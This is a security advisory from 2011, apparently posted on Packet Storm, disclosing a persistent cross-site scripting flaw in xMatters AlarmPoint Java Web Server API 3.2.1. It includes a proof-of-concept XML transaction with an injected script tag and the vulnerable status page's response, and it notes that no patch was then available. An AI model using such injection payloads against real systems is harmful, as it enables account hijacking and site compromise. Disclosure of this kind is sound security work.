xMatters AlarmPoint Java Web Server API 3.2.1 Cross Site Scripting

2011-04-28T00:00:00
ID PACKETSTORM:100919
Type packetstorm
Reporter Juan Sacco
Modified 2011-04-28T00:00:00

Description

                                        
                                            ` Information  
--------------------  
Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web   
Server API  
Software : xMatters AlarmPoint  
Vendor Homepage : http://www.xmatters.com  
Vulnerability Type : Cross-Site Scripting  
Severity : High  
Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>  
  
Description  
------------------  
The AlarmPoint Java Server consists of a collection of software   
components and software APIs designed to provide a flexible and  
powerful set of tools for integrating various applications to   
AlarmPoint.  
  
Details  
-------------------  
AlarmPoint Java Web Server API is affected by a Persistent XSS   
vulnerability in version 3.2.1  
  
Exploit as follow:  
Insert new HTTP API with the following malicious code:  
<?xml version="1.0"?>  
<transaction version="1.0">  
<header>  
<method>Alive</method>  
</header>  
<data>  
<agent_client_id>ping</agent_client_id>  
</data>  
</transaction>'><script>alert(/XSS/)</script>  
  
Go to: http://example.com:2010/agent/status.html  
Reponse:  
AgentStatus  
3.2.1 (Build   
23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'><script>alert(/XSS/)</script>  
  
Cross-Site Scripting attacks are a type of injection problem, in which   
malicious scripts are injected into the otherwise benign and trusted web   
sites.  
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29  
  
Solution  
-------------------  
No patch are available at this time.  
  
Credits  
-------------------  
Manual discovered by Insecurity Research Labs  
Juan Sacco - http://www.insecurityresearch.com  
  
--   
--  
_________________________________________________  
Insecurity Research - Security auditing and testing software  
Web: http://www.insecurityresearch.com  
Insect Pro 2.5 was released stay tunned  
  
`